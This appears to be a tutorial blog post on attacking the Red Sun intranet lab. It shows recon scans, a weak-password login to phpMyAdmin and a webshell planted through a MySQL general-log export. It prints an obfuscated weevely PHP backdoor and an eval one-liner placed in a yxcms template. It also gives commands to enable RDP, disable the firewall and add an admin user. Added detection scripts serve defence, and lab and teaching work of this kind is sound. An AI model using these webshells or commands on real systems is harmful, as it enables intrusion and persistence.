[Intranet Attack and Defense in Practice] Red Sun Range 01 (super detailed!! hands-on + AI Q&A, absolute-beginner tutorial)

Red Sun Range (1)


Range download and notes

Download

Red Sun Range official site
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

Notes

  • Default password for the range
    hongrisec@2019

  • Disk space to reserve
    [Attacker Kali_2023.3] 70G
    [Target Win7] 32G
    [Target Win2K3] 11G
    [Target WinServer08] 23G


Environment setup

Virtual Network Editor

Change the addresses of the two adapters VMnet1 and VMnet2

Check the adapters in cmd to make sure the change has taken effect

Jump host Win 7 (VMnet1 - 72.131, VMnet2 - 52.143)

It prompts that the password has expired; change the password

After the first login, reboot the machine once more, otherwise phpStudy may fail to start.

After the reboot, go to C:\phpStudy and start phpStudy

Open http://127.0.0.1/ in the browser

Check the local IP in cmd

Domain member host Win2K3 (VMnet2 - 52.141)

Domain controller Server 2008 R2 (VMnet2 - 52.138)

Password-expired prompt; change the password

Change the password to hongri@2024

Attacker Kali_2023.3 (NAT - 196.123, VMnet1 - 72.200)

The official documentation does not mention a NAT adapter, but since Kali is the attacker and may need tools the system does not ship with, I added one so it can reach the Internet to download tools.

If the adapter shows DOWN or cannot obtain an IP after it is added, as below:

Edit /etc/network/interfaces, switch the interfaces to static, and restart networking

┌──(root㉿kali)-[~]
└─# vi /etc/network/interfaces 
                                                                                                                           
┌──(root㉿kali)-[~]
└─# /etc/init.d/networking restart
Restarting networking (via systemctl): networking.service.   
                                                                                                                           
┌──(root㉿kali)-[~]
└─# ip a                          
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host proto kernel_lo 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:fa:4e:d4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.196.3/24 brd 192.168.196.255 scope global dynamic noprefixroute eth0
       valid_lft 1796sec preferred_lft 1796sec
    inet6 fe80::20c:29ff:fefa:4ed4/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:fa:4e:de brd ff:ff:ff:ff:ff:ff
    inet 192.168.72.200/24 brd 192.168.72.255 scope global eth1
       valid_lft forever preferred_lft forever
                                                                                                                           
┌──(root㉿kali)-[~]
└─# ping www.badiu.com
PING www.badiu.com (67.227.226.240) 56(84) bytes of data.
64 bytes from lb01.parklogic.com (67.227.226.240): icmp_seq=1 ttl=128 time=306 ms
64 bytes from lb01.parklogic.com (67.227.226.240): icmp_seq=2 ttl=128 time=298 ms
64 bytes from lb01.parklogic.com (67.227.226.240): icmp_seq=3 ttl=128 time=289 ms
64 bytes from lb01.parklogic.com (67.227.226.240): icmp_seq=4 ttl=128 time=294 ms
^Z
zsh: suspended  ping www.badiu.com
                                                                                                                           
┌──(root㉿kali)-[~]
└─# cat /etc/network/interfaces 
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).


source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.196.123
netmask 255.255.255.0
gateway 192.168.196.111

auto eth1
iface eth1 inet static
address 192.168.72.200
netmask 255.255.255.0
gateway 192.168.72.2
                                                                                                                           
┌──(root㉿kali)-[~]
└─# 

Snapshot

At this point the environment is set up. Remember to take an initial snapshot of every machine!!

Topology diagram

✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌

Kali: getting into the phpMyAdmin backend

Scan the 72.0 subnet

┌──(root㉿kali)-[~]
└─# nmap 192.168.72.0/24           
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-30 00:45 HKT
Nmap scan report for 192.168.72.1
Host is up (0.00092s latency).
All 1000 scanned ports on 192.168.72.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:01 (VMware)

Nmap scan report for 192.168.72.131
Host is up (0.00019s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:05:03:81 (VMware)

Nmap scan report for 192.168.72.254
Host is up (0.00013s latency).
All 1000 scanned ports on 192.168.72.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:F3:AF:4C (VMware)

Nmap scan report for 192.168.72.200
Host is up (0.0000030s latency).
All 1000 scanned ports on 192.168.72.200 are in ignored states.
Not shown: 1000 closed tcp ports (reset)

Nmap done: 256 IP addresses (4 hosts up) scanned in 12.03 seconds
                                                                                                                                      
┌──(root㉿kali)-[~]


Scan ports 80 and 3306

┌──(root㉿kali)-[~]
└─# nmap 192.168.72.131 -p80,3306 -A -sV

Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-30 01:06 HKT
Nmap scan report for 192.168.72.131
Host is up (0.00033s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014 
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:05:03:81 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 8.1 R1 (96%), Microsoft Windows Phone 7.5 or 8.0 (96%), Microsoft Windows Embedded Standard 7 (96%), Microsoft Windows Server 2008 or 2008 Beta 3 (92%), Microsoft Windows Server 2008 R2 or Windows 8.1 (92%), Microsoft Windows 7 Professional or Windows 8 (92%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (92%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (92%), Microsoft Windows 7 (90%), Microsoft Windows Server 2008 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.33 ms 192.168.72.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.75 seconds
                                                                                                                                                      


Scan the website directories

┌──(root㉿kali)-[~]
└─# dirb http://192.168.72.131


-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu May 30 01:06:51 2024
URL_BASE: http://192.168.72.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.72.131/ ----
+ http://192.168.72.131/aux (CODE:403|SIZE:212)                                                                                       
+ http://192.168.72.131/com1 (CODE:403|SIZE:213)                                                                                      
+ http://192.168.72.131/com2 (CODE:403|SIZE:213)                                                                                      
+ http://192.168.72.131/com3 (CODE:403|SIZE:213)                                                                                      
+ http://192.168.72.131/con (CODE:403|SIZE:212)                                                                                       
+ http://192.168.72.131/lpt1 (CODE:403|SIZE:213)                                                                                      
+ http://192.168.72.131/lpt2 (CODE:403|SIZE:213)                                                                                      
+ http://192.168.72.131/nul (CODE:403|SIZE:212)                                                                                       
+ http://192.168.72.131/phpinfo.php (CODE:200|SIZE:71475)                                                                             
==> DIRECTORY: http://192.168.72.131/phpmyadmin/                                                                                      
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/                                                                                      
+ http://192.168.72.131/prn (CODE:403|SIZE:212)                                                                                       
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/ ----
+ http://192.168.72.131/phpmyadmin/aux (CODE:403|SIZE:223)                                                                            
+ http://192.168.72.131/phpmyadmin/changelog (CODE:200|SIZE:32593)                                                                    
+ http://192.168.72.131/phpmyadmin/ChangeLog (CODE:200|SIZE:32593)                                                                    
+ http://192.168.72.131/phpmyadmin/com1 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpmyadmin/com2 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpmyadmin/com3 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpmyadmin/con (CODE:403|SIZE:223)                                                                            
==> DIRECTORY: http://192.168.72.131/phpmyadmin/examples/                                                                             
+ http://192.168.72.131/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)                                                                  
+ http://192.168.72.131/phpmyadmin/index.php (CODE:200|SIZE:4378)                                                                     
==> DIRECTORY: http://192.168.72.131/phpmyadmin/js/                                                                                   
==> DIRECTORY: http://192.168.72.131/phpmyadmin/libraries/                                                                            
+ http://192.168.72.131/phpmyadmin/license (CODE:200|SIZE:18011)                                                                      
+ http://192.168.72.131/phpmyadmin/LICENSE (CODE:200|SIZE:18011)                                                                      
==> DIRECTORY: http://192.168.72.131/phpmyadmin/locale/                                                                               
+ http://192.168.72.131/phpmyadmin/lpt1 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpmyadmin/lpt2 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpmyadmin/nul (CODE:403|SIZE:223)                                                                            
+ http://192.168.72.131/phpmyadmin/phpinfo.php (CODE:200|SIZE:4378)                                                                   
+ http://192.168.72.131/phpmyadmin/prn (CODE:403|SIZE:223)                                                                            
+ http://192.168.72.131/phpmyadmin/readme (CODE:200|SIZE:2101)                                                                        
+ http://192.168.72.131/phpmyadmin/Readme (CODE:200|SIZE:2101)                                                                        
+ http://192.168.72.131/phpmyadmin/README (CODE:200|SIZE:2101)                                                                        
+ http://192.168.72.131/phpmyadmin/robots.txt (CODE:200|SIZE:26)                                                                      
==> DIRECTORY: http://192.168.72.131/phpmyadmin/setup/                                                                                
==> DIRECTORY: http://192.168.72.131/phpmyadmin/themes/                                                                               
==> DIRECTORY: http://192.168.72.131/phpmyadmin/Themes/                                                                               
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/ ----
+ http://192.168.72.131/phpMyAdmin/aux (CODE:403|SIZE:223)                                                                            
+ http://192.168.72.131/phpMyAdmin/changelog (CODE:200|SIZE:32593)                                                                    
+ http://192.168.72.131/phpMyAdmin/ChangeLog (CODE:200|SIZE:32593)                                                                    
+ http://192.168.72.131/phpMyAdmin/com1 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpMyAdmin/com2 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpMyAdmin/com3 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpMyAdmin/con (CODE:403|SIZE:223)                                                                            
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/examples/                                                                             
+ http://192.168.72.131/phpMyAdmin/favicon.ico (CODE:200|SIZE:18902)                                                                  
+ http://192.168.72.131/phpMyAdmin/index.php (CODE:200|SIZE:4378)                                                                     
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/js/                                                                                   
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/libraries/                                                                            
+ http://192.168.72.131/phpMyAdmin/license (CODE:200|SIZE:18011)                                                                      
+ http://192.168.72.131/phpMyAdmin/LICENSE (CODE:200|SIZE:18011)                                                                      
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/locale/                                                                               
+ http://192.168.72.131/phpMyAdmin/lpt1 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpMyAdmin/lpt2 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpMyAdmin/nul (CODE:403|SIZE:223)                                                                            
+ http://192.168.72.131/phpMyAdmin/phpinfo.php (CODE:200|SIZE:4378)                                                                   
+ http://192.168.72.131/phpMyAdmin/prn (CODE:403|SIZE:223)                                                                            
+ http://192.168.72.131/phpMyAdmin/readme (CODE:200|SIZE:2101)                                                                        
+ http://192.168.72.131/phpMyAdmin/Readme (CODE:200|SIZE:2101)                                                                        
+ http://192.168.72.131/phpMyAdmin/README (CODE:200|SIZE:2101)                                                                        
+ http://192.168.72.131/phpMyAdmin/robots.txt (CODE:200|SIZE:26)                                                                      
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/setup/                                                                                
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/themes/                                                                               
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/Themes/                                                                               
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/examples/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/locale/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/setup/ ----
+ http://192.168.72.131/phpmyadmin/setup/aux (CODE:403|SIZE:229)                                                                      
+ http://192.168.72.131/phpmyadmin/setup/com1 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpmyadmin/setup/com2 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpmyadmin/setup/com3 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpmyadmin/setup/con (CODE:403|SIZE:229)                                                                      
==> DIRECTORY: http://192.168.72.131/phpmyadmin/setup/frames/                                                                         
+ http://192.168.72.131/phpmyadmin/setup/index.php (CODE:200|SIZE:6820)                                                               
==> DIRECTORY: http://192.168.72.131/phpmyadmin/setup/lib/                                                                            
+ http://192.168.72.131/phpmyadmin/setup/lpt1 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpmyadmin/setup/lpt2 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpmyadmin/setup/nul (CODE:403|SIZE:229)                                                                      
+ http://192.168.72.131/phpmyadmin/setup/prn (CODE:403|SIZE:229)                                                                      
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/Themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/examples/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/locale/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/setup/ ----
+ http://192.168.72.131/phpMyAdmin/setup/aux (CODE:403|SIZE:229)                                                                      
+ http://192.168.72.131/phpMyAdmin/setup/com1 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpMyAdmin/setup/com2 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpMyAdmin/setup/com3 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpMyAdmin/setup/con (CODE:403|SIZE:229)                                                                      
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/setup/frames/                                                                         
+ http://192.168.72.131/phpMyAdmin/setup/index.php (CODE:200|SIZE:6820)                                                               
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/setup/lib/                                                                            
+ http://192.168.72.131/phpMyAdmin/setup/lpt1 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpMyAdmin/setup/lpt2 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpMyAdmin/setup/nul (CODE:403|SIZE:229)                                                                      
+ http://192.168.72.131/phpMyAdmin/setup/prn (CODE:403|SIZE:229)                                                                      
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/Themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/setup/frames/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/setup/frames/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Thu May 30 01:07:08 2024
DOWNLOADED: 23060 - FOUND: 70
                                                                                                                                       
┌──(root㉿kali)-[~]
└─# 


Open the backend in the browser

Browse to: http://192.168.72.131/phpmyadmin/

Try logging in with a weak password (successfully entered the backend!!)

Getting a shell via log export

Query the log settings in SQL

show variables like '%general%';


Log settings

Set the log file location
set global general_log_file ='C:\\phpStudy\\WWW\\shell.php' ;

Check

show variables like '%general%';


Turn the general log on (every statement is now written to the file)
SET GLOBAL general_log='on'; 

Check

show variables like '%general%';


Generate a webshell with weevely

                                                                                                                           
┌──(root㉿kali)-[~]
└─#  weevely generate x ./shell.php
Generated './1.php' with password 'x' of 754 byte size.
                                                                                                                           
┌──(root㉿kali)-[~]
└─# cat shell.php               
<?php
$g='{$o.=Jk$t{$iJk}^Jk$k{$j};Jk}}JkreJkturn $o;}ifJk (@preg_mJkatcJkh("/$JkkhJk(.+)$kf/Jk",@file_get_coJkntenJkts("php:/J';
$v=str_replace('PF','','crPFPFeate_PFPFfuncPFPFtion');
$T='k/inJkpJkut"),$Jkm)==1) {@ob_starJktJk();@evaJkl(@gJkzunJkcompress(@x(@baJkseJk64_decodJke($m[1])Jk,$Jkk)));$o=@Jkob_gJk';
$c='Jket_cJkontents();@ob_Jkend_cleJkan();$rJk=@basJkJke64_encode(@xJk(@gzcoJkmpreJkss($oJk),$Jkk));prJkint("$p$kh$Jkr$kf");}';
$h='$k="9ddJk4e461";Jk$kJkh="268c803Jk4fJk5c8";$kf="5Jk64Jke155cJk67a6"Jk;$pJk="vOwpscpMt4b6Jk4FbA";fJkJkunction x(Jk$tJk';
$z=',$kJk){$c=strJklen($k);$l=sJktrJklen($Jkt);$o=""Jk;Jkfor($i=Jk0;$i<$Jkl;){for($JkJkj=0;($j<Jk$c&&$iJk<$l);$j++,$iJk++)';
$Z=str_replace('Jk','',$h.$z.$g.$T.$c);
$G=$v('',$Z);$G();
?>
                                                                                                                                      

Add the webshell inside a SQL comment

select 1;/*

<?php
$g='{$o.=Jk$t{$iJk}^Jk$k{$j};Jk}}JkreJkturn $o;}ifJk (@preg_mJkatcJkh("/$JkkhJk(.+)$kf/Jk",@file_get_coJkntenJkts("php:/J';
$v=str_replace('PF','','crPFPFeate_PFPFfuncPFPFtion');
$T='k/inJkpJkut"),$Jkm)==1) {@ob_starJktJk();@evaJkl(@gJkzunJkcompress(@x(@baJkseJk64_decodJke($m[1])Jk,$Jkk)));$o=@Jkob_gJk';
$c='Jket_cJkontents();@ob_Jkend_cleJkan();$rJk=@basJkJke64_encode(@xJk(@gzcoJkmpreJkss($oJk),$Jkk));prJkint("$p$kh$Jkr$kf");}';
$h='$k="9ddJk4e461";Jk$kJkh="268c803Jk4fJk5c8";$kf="5Jk64Jke155cJk67a6"Jk;$pJk="vOwpscpMt4b6Jk4FbA";fJkJkunction x(Jk$tJk';
$z=',$kJk){$c=strJklen($k);$l=sJktrJklen($Jkt);$o=""Jk;Jkfor($i=Jk0;$i<$Jkl;){for($JkJkj=0;($j<Jk$c&&$iJk<$l);$j++,$iJk++)';
$Z=str_replace('Jk','',$h.$z.$g.$T.$c);
$G=$v('',$Z);$G();
?>

*/


Check the webshell injection result

Browse to: http://192.168.72.131/shell.php

Kali connects to the webshell (shell obtained!!)

┌──(root㉿kali)-[~]
└─# weevely http://192.168.72.131/shell.php x  

[+] weevely 4.0.1

[+] Target:     192.168.72.131
[+] Session:    /root/.weevely/sessions/192.168.72.131/shell_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> whoami
god\administrator
stu1:C:\phpStudy\WWW $ 

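A defender-side check for the log-export technique above, added here as an example (not code from the original post). It parses the output of SHOW VARIABLES LIKE '%general%', flags a general log that is switched on or written under the web root (C:\phpStudy\WWW comes from the walkthrough; any other roots are assumptions), and scans constructed general-log lines for PHP open tags:

```python
r"""Audit MySQL general_log settings and check a general log for planted PHP.

Added example, not from the original post. It models the technique the
walkthrough uses: general_log_file is pointed into the phpStudy web root
(C:\phpStudy\WWW), general_log is switched ON, and a query carrying PHP inside
a SQL comment is then written verbatim to shell.php.

Hardening notes (not enforced here): keep general_log=OFF, keep general_log_file
under the MySQL data directory, and do not give the account phpMyAdmin uses the
SUPER privilege, which SET GLOBAL requires in this MySQL version.
"""
import re
from pathlib import PureWindowsPath

WEB_ROOTS = [r"C:\phpStudy\WWW"]   # the walkthrough's web root; extend per host
SCRIPT_EXTS = {".php", ".phtml", ".php3", ".php5", ".phar"}
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)

# Constructed sample: what SHOW VARIABLES LIKE '%general%' prints after the
# two SET GLOBAL statements from the walkthrough.
SHOW_VARIABLES_OUTPUT = """
+------------------+------------------------------+
| Variable_name    | Value                        |
+------------------+------------------------------+
| general_log      | ON                           |
| general_log_file | C:\\phpStudy\\WWW\\shell.php |
+------------------+------------------------------+
"""

# Constructed sample of general-log content after the injected query.
GENERAL_LOG_SAMPLE = """\
240530  1:12:44     5 Query     show variables like '%general%'
240530  1:13:02     5 Query     select 1;/*
<?php @eval($_POST['x']); ?>
*/
240530  1:13:20     5 Quit
"""


def parse_show_variables(text):
    """Parse the 'Variable_name | Value' table into a dict."""
    out = {}
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) == 2 and cells[0] and cells[0] != "Variable_name":
            out[cells[0]] = cells[1]
    return out


def under_web_root(path, roots=WEB_ROOTS):
    """True if path is a web root or lies below one (case-insensitive, any slash style)."""
    p = str(PureWindowsPath(path)).lower()
    for root in roots:
        r = str(PureWindowsPath(root)).lower()
        if p == r or p.startswith(r + "\\"):
            return True
    return False


def audit_general_log(variables, roots=WEB_ROOTS):
    """Return findings; an empty list means the general-log settings look benign."""
    findings = []
    log_file = variables.get("general_log_file", "")
    if variables.get("general_log", "OFF").upper() == "ON":
        findings.append("general_log is ON: every statement is written verbatim to disk")
    if log_file and under_web_root(log_file, roots):
        findings.append(f"general_log_file is inside a web root: {log_file}")
    if log_file and PureWindowsPath(log_file).suffix.lower() in SCRIPT_EXTS:
        findings.append(f"general_log_file has a server-side script extension: {log_file}")
    return findings


def php_in_log(log_text):
    """Return (line_no, line) for log lines that carry a PHP open tag."""
    return [(n, line) for n, line in enumerate(log_text.splitlines(), 1)
            if PHP_TAG.search(line)]


if __name__ == "__main__":
    variables = parse_show_variables(SHOW_VARIABLES_OUTPUT)
    for finding in audit_general_log(variables):
        print("[!]", finding)
    for n, line in php_in_log(GENERAL_LOG_SAMPLE):
        print(f"[!] PHP tag in general log, line {n}: {line.strip()}")
```

php_in_log works on any text, so the same check can be run over the yxcms template files later in the walkthrough.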

Remote login to Win 7

Create an administrator account from the shell

Enable 3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Disable the firewall

netsh firewall set opmode disable

Add an account and put it in the Administrators group

net user

net user hack01 1324@cbD /add

net localgroup Administrators hack01 /add

net user 

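A detection-side view of the steps above, added as an example that is not part of the original post: it correlates constructed Windows Security events (IDs 4720, 4732, 4657) for the "flip fDenyTSConnections, create a user, add it to Administrators" sequence. The event fields, timestamps and account names are constructed, and the firewall change is not modeled.

```python
"""Correlate Windows Security events for the 'enable RDP + add local admin' sequence.

Added example, not from the original post. The events below are constructed to
mirror the walkthrough's steps (fDenyTSConnections set to 0, hack01 created,
hack01 added to Administrators) and are not real logs.

Event IDs (Windows Security log):
  4720  a user account was created
  4732  a member was added to a security-enabled local group
  4657  a registry value was modified (requires object-access auditing on the key)
The firewall change (netsh firewall set opmode disable) is not modeled here.
"""
from datetime import datetime, timedelta

EVENTS = [  # constructed sample; real 4732 records carry the member's SID, which
            # must be resolved to a name before matching (simplified here)
    {"time": "2024-05-30 01:20:05", "id": 4657, "subject": "GOD\\Administrator",
     "object": r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server",
     "value": "fDenyTSConnections", "new": "0"},
    {"time": "2024-05-30 01:20:31", "id": 4720, "subject": "GOD\\Administrator",
     "target": "hack01"},
    {"time": "2024-05-30 01:20:40", "id": 4732, "subject": "GOD\\Administrator",
     "group": "Administrators", "member": "hack01"},
    # routine account creation with no group change: must not alert
    {"time": "2024-05-30 09:00:00", "id": 4720, "subject": "GOD\\helpdesk",
     "target": "intern02"},
]
WINDOW = timedelta(minutes=10)


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def new_local_admins(events, window=WINDOW):
    """(member, subject) pairs: a 4720 followed within `window` by a 4732 into Administrators."""
    created = {e["target"].lower(): _ts(e["time"]) for e in events if e["id"] == 4720}
    hits = []
    for e in events:
        if e["id"] != 4732 or e["group"].lower() != "administrators":
            continue
        member = e["member"].lower()
        if member in created and timedelta(0) <= _ts(e["time"]) - created[member] <= window:
            hits.append((e["member"], e["subject"]))
    return hits


def rdp_enabled_via_registry(events):
    """Subjects that set fDenyTSConnections to 0 (event 4657)."""
    return [e["subject"] for e in events
            if e["id"] == 4657 and e.get("value", "").lower() == "fdenytsconnections"
            and e.get("new") == "0"]


def alerts(events, window=WINDOW):
    """A subject who both enabled RDP and minted a new local admin is rated high."""
    rdp_by = set(rdp_enabled_via_registry(events))
    return [{"severity": "high" if subject in rdp_by else "medium",
             "subject": subject, "new_admin": member}
            for member, subject in new_local_admins(events, window)]


if __name__ == "__main__":
    for alert in alerts(EVENTS):
        print(alert)
```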

Log in with rdesktop (successfully logged in to Win 7!!)

Open a new terminal, ping to test whether the firewall is off, then connect to 3389 with rdesktop

┌──(root㉿kali)-[~]
└─# ping 192.168.72.131         
PING 192.168.72.131 (192.168.72.131) 56(84) bytes of data.
64 bytes from 192.168.72.131: icmp_seq=1 ttl=128 time=9.13 ms
64 bytes from 192.168.72.131: icmp_seq=2 ttl=128 time=0.516 ms
64 bytes from 192.168.72.131: icmp_seq=3 ttl=128 time=0.969 ms
64 bytes from 192.168.72.131: icmp_seq=4 ttl=128 time=0.550 ms
64 bytes from 192.168.72.131: icmp_seq=5 ttl=128 time=0.422 ms
^Z
zsh: suspended  ping 192.168.72.131
                                                                                                                                      
┌──(root㉿kali)-[~]
└─# rdesktop 192.168.72.131:3389

ATTENTION! The server uses and invalid security certificate which can not be trusted for
the following identified reasons(s);

 1. Certificate issuer is not trusted by this system.

     Issuer: CN=stu1.god.org


Review the following certificate info before you trust it to be added as an exception.
If you do not trust the certificate the connection atempt will be aborted:

    Subject: CN=stu1.god.org
     Issuer: CN=stu1.god.org
 Valid From: Wed May 29 09:05:59 2024
         To: Thu Nov 28 09:05:59 2024

  Certificate fingerprints:

       sha1: 04789b7d77a2bffae4470d276265fda35a3f6c54
     sha256: 9324cd26a0397ba1655a3d5bbd00b27e5a9b1280a8048dc8c0e6b0ddd366278a


Do you trust this certificate (yes/no)? yes


Getting domain privileges via Win 7

Win 7 information gathering

Although the newly created user hack01 has administrator rights on Win 7, hack01 can only query information about the local machine; it has no privileges in the domain, so cmd cannot retrieve any more useful information about the domain controller.
So now we need to find a way to get domain privileges.

Browse to: http://192.168.72.131/yxcms/

Getting into the yxcms backend

Browse to: http://192.168.72.131/yxcms/index.php?r=admin/index/login

Upload a one-line webshell

 @eval($_POST['x']);
<?php 
@eval($_POST['x']);
return array (
  'name' => '最新默认模板2013-2-1',
  'author' => 'yx',
); ?> 


Confirm the template location

Using the yxcms version information, you can search for the related project and confirm where the template lives within it.

Browse to: http://192.168.72.131/yxcms/protected/apps/default/view/default/info.php

This shows a blank page.

Plugin: HackBar

Install HackBar in Firefox: https://addons.mozilla.org/zh-CN/firefox/addon/new-hackbar/

